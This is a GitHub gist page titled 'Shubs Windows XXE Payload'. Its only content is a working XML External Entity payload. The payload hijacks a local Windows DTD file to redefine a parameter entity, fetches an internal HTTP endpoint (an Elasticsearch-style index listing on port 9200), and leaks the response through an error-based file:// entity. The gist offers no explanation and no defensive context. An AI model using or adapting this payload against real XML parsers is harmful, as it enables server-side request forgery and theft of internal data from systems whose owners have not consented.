Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save dslusser/2e5b3b32d81a66638dc1dd6eb208c17d to your computer and use it in GitHub Desktop.
Save dslusser/2e5b3b32d81a66638dc1dd6eb208c17d to your computer and use it in GitHub Desktop.
Shubs Windows XXE Payload
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "http://example.com:9200/_cat/indices">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment